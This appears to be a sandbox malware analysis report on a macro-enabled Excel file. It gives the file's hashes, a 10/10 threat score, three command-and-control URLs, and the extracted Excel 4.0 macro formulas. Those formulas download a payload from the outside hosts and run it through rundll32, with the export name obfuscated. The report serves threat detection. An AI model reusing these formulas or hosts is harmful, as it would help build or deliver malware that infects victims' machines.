General

  • Target

    ?i=1ynrmaxlo

  • Size

    83KB

  • MD5

    597e9be00a6e6597e041ea986dac1252

  • SHA1

    ec554fff3d8d0d18de86a1def864340963afb925

  • SHA256

    eb3e8690d152148f0bc7d306065ba030410ba35eb5e672f09041b20cf000ee4f

  • SHA512

    6cb5570a2394704f0e30c8dc9cabec9b1b5451e5035f9c0532e74ff951bd824f02f943325d41dfd56a9de1b85b816d24182aa35f75062e736809d9fb06bc59cb

  • SSDEEP

    1536:MWBsqxG/+CbEcWeu3XDXeoiHwt/uE1d7mT6SrPag3HtQVASgoRz:RG/+CbE9H78wt2E1d7e6STa6SPz

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://mammy-chiro.com/case/ZTkBzbz/

http://bluetoothheadsetreview.xyz/wp-includes/xmdHAGgfki/

http://topline36.xyz/wp-includes/css/BB9Ajvjs89U9O/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mammy-chiro.com/case/ZTkBzbz/","..\dwa.ocx",0,0)
    =IF('RHEEHGF'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bluetoothheadsetreview.xyz/wp-includes/xmdHAGgfki/","..\dwa.ocx",0,0))
    =IF('RHEEHGF'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://topline36.xyz/wp-includes/css/BB9Ajvjs89U9O/","..\dwa.ocx",0,0))
    =IF('RHEEHGF'!D21<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\rundll32.exe ..\dwa.ocx,D""&""l""&""lR""&""egister""&""Server")
    =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with Excel 4.0 macros.

Files

  • ?i=1ynrmaxlo
    .xlsm office2007
